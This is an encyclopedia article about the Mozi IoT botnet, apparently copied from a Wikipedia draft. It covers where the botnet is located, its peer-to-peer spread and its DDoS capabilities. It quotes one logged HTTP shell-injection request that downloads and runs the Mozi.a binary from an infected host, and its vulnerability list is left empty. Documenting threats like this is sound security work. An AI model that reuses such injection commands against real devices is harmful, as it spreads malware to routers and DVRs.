Mozi botnet
The Mozi Botnet is a botnet targeting IoT devices. In September 2019, 71% of the botnet was located in China. In March, it jumped to 81%.[1] The botnet was first discovered near the end of 2019 and is currently active. Similar to the Mirai botnet, it targets consumer routers via security vulnerabilities and shell injections.[2] It uses peer to peer technology to spread infectious code to new hosts.[3]
Behavior[edit]
While the botnet can target IoT devices via weak telnet passwords, it can also exploit over HTTP.[4]
115.51.xx.xx - - [13/Nov/2020:15:54:19 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://115.51.xx.xx:36669/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 4214 "-" "Hello, world"
In the request above, an infected host attempts to download and execute the "Mozi.a" file on to the requested server. The Mozi.a file is stored on the infected host on a random port. Targeted hosts include routers and DVRs.
The Botnet targets the following vulnerabilities:
The malware inserted onto the server is designed to interact with other Peers to exchange information. The malware can be executed on ARM of MIPS processors. Once a host is infected, it can carry out DDoS attacks, payload execution, and additional distribution of the malware.
References[edit]
- ↑ "New Mozi malware family quietly amasses IoT bots". Lumen. 2020-04-13. Retrieved 2021-03-28.
- ↑ "A New Botnet Attack Just Mozied Into Town". Security Intelligence. Retrieved 2021-03-28.
- ↑ "Mozi Botnet Accounts for Most Traffic in Q1 2020, New Research Shows". Bitdefender Box. Retrieved 28 March 2021. Unknown parameter
|url-status=
ignored (help) - ↑ "New Mozi malware family quietly amasses IoT bots". Lumen. 2020-04-13. Retrieved 2021-03-28.
Mozi Botnet Article Submission[edit]
This article "Mozi botnet" is from Wikipedia. The list of its authors can be seen in its historical and/or the page Edithistory:Mozi botnet. Articles copied from Draft Namespace on Wikipedia could be seen on the Draft Namespace of Wikipedia and not main one.